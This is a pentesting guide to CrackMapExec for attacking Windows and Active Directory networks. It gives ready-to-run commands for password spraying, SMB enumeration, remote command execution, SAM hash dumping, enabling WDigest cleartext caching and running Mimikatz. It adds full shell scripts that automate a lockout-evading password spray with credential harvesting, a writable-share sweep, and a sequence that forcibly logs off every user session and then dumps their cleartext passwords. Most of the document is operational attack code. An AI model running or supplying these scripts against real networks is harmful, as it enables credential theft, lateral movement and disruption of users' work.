# Using Crackmapexec

CrackMapExec (CME) is a one-stop tool for pentesting Windows and Active Directory. It wraps the tools and commands explained in the previous section and more: enumerating SMB shares, users and groups, spraying passwords, dumping credentials, running commands on hosts you have admin on, and injecting Mimikatz, shellcode or DLLs into memory. Every example on this page uses the `smb` protocol handler. Two output markers matter throughout: `[+]` on a login line means the credentials are valid, and `(Pwn3d!)` after it means the account is a local administrator on that host, which is what the command-execution and credential-dumping options below require.

<details>

<summary>Username &#x26; Password Spraying</summary>

CrackMapExec can try a list of usernames against a list of passwords over SMB. By default it tries every user/password combination and stops at the first valid login on a host; add `--continue-on-success` to keep going. Read the domain lockout policy first (`--pass-pol`, below), because every password in the list is one failed attempt against every user in the list.

```
crackmapexec smb 192.168.1.10 -u username.txt -p password.txt
```
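The lockout-aware way to run that spray, as an added example (not code from the CrackMapExec project or from the original page): it reads the lockout policy CME prints with `--pass-pol`, sprays in batches that stay one attempt under the threshold, waits out the reset window between batches, stops if any account comes back locked, and pulls the valid logins out of CME's `[+]` lines. The target address, the file names and the `SAMPLE_*` strings are assumptions; the samples are constructed in the shape of CME's output, not captured from a real host.

```shell
#!/bin/sh
# Added example (not part of CrackMapExec): lockout-aware password spray.
# Assumptions (hypothetical): target 192.168.1.10, users.txt / password.txt
# in the working directory; SAMPLE_* strings are constructed in the shape
# of CME's output, not captured from a real host.
TARGET="${TARGET:-192.168.1.10}"
USERS="${USERS:-users.txt}"
PASSWORDS="${PASSWORDS:-password.txt}"

# Constructed sample of: crackmapexec smb $TARGET -u user -p pass --pass-pol
SAMPLE_PASSPOL='SMB  192.168.1.10  445  DC01  [+] Dumping password info for domain: CORP
SMB  192.168.1.10  445  DC01  Minimum password length: 7
SMB  192.168.1.10  445  DC01  Account Lockout Threshold: 5
SMB  192.168.1.10  445  DC01  Reset Account Lockout Counter: 30 minutes
SMB  192.168.1.10  445  DC01  Locked Account Duration: 30 minutes'

# Constructed sample of one batch: -u users.txt -p batch --continue-on-success
SAMPLE_SPRAY='SMB  192.168.1.10  445  DC01  [-] CORP\bob:Winter2023! STATUS_LOGON_FAILURE
SMB  192.168.1.10  445  DC01  [+] CORP\alice:Winter2023! (Pwn3d!)
SMB  192.168.1.10  445  DC01  [+] CORP\carol:Winter2023!
SMB  192.168.1.10  445  DC01  [-] CORP\dave:Winter2023! STATUS_ACCOUNT_LOCKED_OUT'

# Lockout threshold from --pass-pol output; 0 when the policy says "None".
lockout_threshold() {
    n=$(printf '%s\n' "$1" | sed -n 's/.*Account Lockout Threshold: *\([0-9]*\).*/\1/p' | head -n 1)
    case "$n" in ''|*[!0-9]*) echo 0 ;; *) echo "$n" ;; esac
}

# Minutes until the bad-password counter resets; 0 if not reported.
lockout_reset_minutes() {
    n=$(printf '%s\n' "$1" | sed -n 's/.*Reset Account Lockout Counter: *\([0-9]*\).*/\1/p' | head -n 1)
    case "$n" in ''|*[!0-9]*) echo 0 ;; *) echo "$n" ;; esac
}

# Passwords per batch: one below the threshold (each user gets one failed
# attempt per password in the batch); the whole list when there is no lockout.
batch_size() {   # $1 = threshold, $2 = total passwords
    if [ "$1" -eq 0 ]; then echo "$2"; else echo $(( $1 - 1 )); fi
}

# "DOMAIN\user:password" for each [+] login, with " ADMIN" appended when CME
# marked the account (Pwn3d!), i.e. local admin on that host.
harvest_hits() {
    printf '%s\n' "$1" | awk '{
        for (i = 1; i <= NF; i++)
            if ($i == "[+]" && index($(i + 1), "\\"))
                printf "%s%s\n", $(i + 1), (index($0, "Pwn3d!") ? " ADMIN" : "")
    }'
}

# Number of STATUS_ACCOUNT_LOCKED_OUT results in a batch; any means the
# policy was misread and spraying must stop.
locked_out_count() {
    printf '%s\n' "$1" | grep -c 'STATUS_ACCOUNT_LOCKED_OUT' || true
}

# Live spray; needs crackmapexec on PATH. Any valid account can read the policy.
spray() {   # $1 = output of a --pass-pol run
    thr=$(lockout_threshold "$1")
    wait_min=$(lockout_reset_minutes "$1")
    total=$(wc -l < "$PASSWORDS" | tr -d ' ')
    size=$(batch_size "$thr" "$total")
    if [ "$size" -le 0 ]; then
        echo "threshold $thr leaves no safe attempt; not spraying" >&2
        return 1
    fi
    tmp=$(mktemp -d)
    split -l "$size" "$PASSWORDS" "$tmp/batch."
    for batch in "$tmp"/batch.*; do
        out=$(crackmapexec smb "$TARGET" -u "$USERS" -p "$batch" --continue-on-success)
        harvest_hits "$out" | tee -a hits.txt
        if [ "$(locked_out_count "$out")" -gt 0 ]; then
            echo "lockout observed; stopping" >&2
            break
        fi
        # Let the bad-password counter reset before the next batch.
        if [ "$wait_min" -gt 0 ]; then sleep $(( wait_min * 60 )); fi
    done
    rm -rf "$tmp"
}

# Offline dry run on the constructed samples:
thr=$(lockout_threshold "$SAMPLE_PASSPOL")
echo "threshold=$thr batch_size=$(batch_size "$thr" 100) reset_minutes=$(lockout_reset_minutes "$SAMPLE_PASSPOL")"
harvest_hits "$SAMPLE_SPRAY"
echo "locked out this batch: $(locked_out_count "$SAMPLE_SPRAY")"
# Live: spray "$(crackmapexec smb "$TARGET" -u user -p pass --pass-pol)"
```

The batch size is threshold minus one, not the threshold itself, because a user who never logs in successfully keeps accumulating bad-password counts until the reset window expires; the sleep between batches is what keeps those counts from stacking.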

</details>

<details>

<summary>Enumerating SMB Info</summary>

Once you have a valid login, CME can enumerate users, groups, shares, sessions and the password policy from the SMB service. Enumeration does not need admin rights; any domain account that can authenticate will do.

```
crackmapexec smb 192.168.1.10 -u 'user' -p 'PASS' --users

# Swap --users for any of the following to fetch the respective info:
# --groups --local-users --rid-brute --shares --sessions --lusers --pass-pol
# --local-auth is a modifier, not an enumeration switch: it authenticates against
# the host's local SAM instead of the domain, e.g. --local-auth --shares
```
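A share sweep is usually run against a whole range rather than one host, and the interesting result is the shares the account can write to. The following is an added example (not code from the CrackMapExec project or the original page) that runs `--shares` across a range and triages the output down to writable, non-administrative shares. The account, the hosts and the `SAMPLE_SHARES` string are assumptions; the sample is constructed in the shape of CME's share table, not captured from a real network.

```shell
#!/bin/sh
# Added example (not part of CrackMapExec): triage a --shares sweep down to
# the shares the account can write to, leaving out ADMIN$ and drive shares
# (being able to write there only restates local admin, which the "(Pwn3d!)"
# marker on the login line already tells you). Assumptions (hypothetical):
# SAMPLE_SHARES is constructed in the shape of CME's share table, one
# "SMB <ip> 445 <host>" prefix per line; the hosts and shares are made up.
CME_USER="${CME_USER:-user}"
CME_PASS="${CME_PASS:-PASS}"

# Constructed sample of: crackmapexec smb 192.168.1.0/24 -u user -p PASS --shares
SAMPLE_SHARES='SMB  192.168.1.10  445  DC01   [+] Enumerated shares
SMB  192.168.1.10  445  DC01   Share           Permissions     Remark
SMB  192.168.1.10  445  DC01   -----           -----------     ------
SMB  192.168.1.10  445  DC01   ADMIN$          READ,WRITE      Remote Admin
SMB  192.168.1.10  445  DC01   C$              READ,WRITE      Default share
SMB  192.168.1.10  445  DC01   NETLOGON        READ            Logon server share
SMB  192.168.1.10  445  DC01   SYSVOL          READ            Logon server share
SMB  192.168.1.20  445  FS01   [+] Enumerated shares
SMB  192.168.1.20  445  FS01   Share           Permissions     Remark
SMB  192.168.1.20  445  FS01   -----           -----------     ------
SMB  192.168.1.20  445  FS01   Public          READ,WRITE      Drop folder
SMB  192.168.1.20  445  FS01   Finance                         Finance team
SMB  192.168.1.20  445  FS01   IT$             READ,WRITE'

# "host ip share permissions" for every share the account can write to.
# A share with no access has an empty Permissions column, so its Remark
# slides into field 6 and never matches READ,WRITE or WRITE.
writable_shares() {
    printf '%s\n' "$1" | awk '
        ($6 == "READ,WRITE" || $6 == "WRITE") && $5 !~ /^(ADMIN\$|[A-Z]\$)$/ {
            print $4, $2, $5, $6
        }'
}

# Live: sweep a host or CIDR range (needs crackmapexec on PATH).
sweep() {   # $1 = target or range, e.g. 192.168.1.0/24
    writable_shares "$(crackmapexec smb "$1" -u "$CME_USER" -p "$CME_PASS" --shares)"
}

# Offline run on the constructed sample:
writable_shares "$SAMPLE_SHARES"
# Live: sweep 192.168.1.0/24
```

Writable shares that are not administrative are where things like logon scripts, installers and user drop folders live, so they are worth a closer look before moving on to the hosts marked `(Pwn3d!)`.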

</details>

<details>

<summary>Remote Code Execution (RCE)</summary>

Command execution needs an account that is a local administrator on the target (the login line shows `(Pwn3d!)`). `-x` runs the command through `cmd.exe`, `-X` through PowerShell. The default execution method is WMI (`wmiexec`); `--exec-method smbexec` or `atexec` are the alternatives when WMI is blocked or you need to avoid it.

```
# Through the command prompt (default exec method: wmiexec)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x 'whoami'

# Through smbexec instead of WMI
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec

# Through PowerShell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X 'whoami'
```

</details>

<details>

<summary>Enumerating Credentials</summary>

{% code overflow="wrap" %}

```
# Dump the local SAM hashes (needs local admin on the target)
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' --local-auth --sam
```

{% endcode %}

`--wdigest enable` sets `UseLogonCredential` to 1 under `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest`, which makes LSASS keep a cleartext copy of the credentials for logons that happen after the change. The value is off by default on Windows 8.1 / Server 2012 R2 and later, and on older systems with KB2871997 installed, so this step is what makes plaintext recovery possible there. The password is then read out with the mimikatz module (next section).

```
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' --local-auth --wdigest enable
```

WDigest only caches credentials at logon, so a user who is already logged in has to log off and on again before their password shows up. `quser` lists the interactive sessions with their IDs, and `logoff <sessionid>` forcibly ends one. This is noisy: the user loses their session and unsaved work, and the logoff is recorded in the Windows event log.

```
# List interactive sessions and their IDs
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' -x 'quser'
# Force one session to log off; the password is cached when the user logs back in
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' -x 'logoff <sessionid>'
```
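The whole WDigest sequence as one script, added here as an example (not code from the CrackMapExec project or the original page). It enables `UseLogonCredential`, verifies the registry value actually took before kicking anyone off, parses the session IDs out of `quser` (whose session-name column is blank for disconnected sessions, so positional parsing breaks), logs each session off, and finally dumps the cached credentials with the mimikatz module. The target, the credentials in `CME_USER`/`CME_PASS` and the `SAMPLE_*` strings are assumptions; the samples are constructed in the shape of CME's prefixed output, not captured from a real host.

```shell
#!/bin/sh
# Added example (not part of CrackMapExec): the WDigest sequence from this
# section as one script. Assumptions (hypothetical): target 192.168.1.10,
# local Administrator credentials in CME_USER/CME_PASS, and CME prefixing
# each line of remote output with "SMB <ip> 445 <host>". SAMPLE_* strings
# are constructed in that shape, not captured from a real host.
TARGET="${TARGET:-192.168.1.10}"
CME_USER="${CME_USER:-Administrator}"
CME_PASS="${CME_PASS:-PASS}"
cme() { crackmapexec smb "$TARGET" -u "$CME_USER" -p "$CME_PASS" --local-auth "$@"; }

# Constructed sample of: cme -x 'reg query HKLM\...\WDigest /v UseLogonCredential'
SAMPLE_REG='SMB  192.168.1.10  445  WS01  [+] Executed command
SMB  192.168.1.10  445  WS01  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
SMB  192.168.1.10  445  WS01      UseLogonCredential    REG_DWORD    0x1'

# Constructed sample of: cme -x quser
SAMPLE_QUSER='SMB  192.168.1.10  445  WS01  [+] Executed command
SMB  192.168.1.10  445  WS01   USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
SMB  192.168.1.10  445  WS01  >administrator         console             1  Active      none   3/4/2024 9:02 AM
SMB  192.168.1.10  445  WS01   jsmith                rdp-tcp#0           2  Active         .   3/4/2024 9:15 AM
SMB  192.168.1.10  445  WS01   mjones                                    3  Disc     1:22      3/4/2024 8:40 AM'

# True when the reg query output shows UseLogonCredential = 0x1.
wdigest_enabled() {
    v=$(printf '%s\n' "$1" | awk '/UseLogonCredential/ { print $NF }' | head -n 1)
    [ "$v" = "0x1" ]
}

# "ID STATE" for every session in quser output. SESSIONNAME is blank for
# disconnected sessions, so the ID is found as the number right before the
# STATE value rather than by column position.
quser_sessions() {
    printf '%s\n' "$1" | awk '{
        for (i = 2; i <= NF; i++)
            if (($i == "Active" || $i == "Disc") && $(i - 1) ~ /^[0-9]+$/)
                print $(i - 1), $i
    }'
}

# Live steps 1-3: enable WDigest, confirm the value took, then log every
# session off so the users re-authenticate (noisy: they lose their session).
enable_and_kick() {
    cme --wdigest enable
    if ! wdigest_enabled "$(cme -x 'reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential')"; then
        echo "UseLogonCredential is not 0x1; not logging anyone off" >&2
        return 1
    fi
    quser_sessions "$(cme -x quser)" | while read -r id state; do
        cme -x "logoff $id"
    done
}

# Live step 4, once the users have logged back in: dump the cached cleartext
# credentials instead of the module's default command.
dump_wdigest() {
    cme -M mimikatz -o COMMAND='sekurlsa::wdigest'
}

# Offline check on the constructed samples:
if wdigest_enabled "$SAMPLE_REG"; then echo "UseLogonCredential=1 confirmed"; fi
quser_sessions "$SAMPLE_QUSER"
# Live: LIVE=1 ./wdigest.sh runs enable_and_kick; call dump_wdigest later.
if [ -n "${LIVE:-}" ]; then enable_and_kick; fi
```

The registry check is the step worth keeping even if you do the rest by hand: forcing logoffs before the value has taken effect costs you the noise without the payoff.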

</details>

<details>

<summary>Using Mimikatz</summary>

The mimikatz module runs Mimikatz in memory on the target and needs local admin there. Without `-o COMMAND=` it runs its default credential dump; `COMMAND=` replaces that with the Mimikatz command you give it. Note that `privilege::debug` on its own only acquires the debug privilege, so pair it with the dump you actually want (for example `sekurlsa::wdigest` after enabling WDigest above).

```
# Authenticate against the local SAM
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' --local-auth -M mimikatz
# Authenticate as a domain account
crackmapexec smb 192.168.1.10 -u 'Administrator' -p 'PASS' -M mimikatz
# Override the module's default Mimikatz command
crackmapexec smb 192.168.1.10 -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'
```

</details>

## Useful Links

<https://stealthbits.com/blog/20170725lateral-movement-with-crackmapexec/>


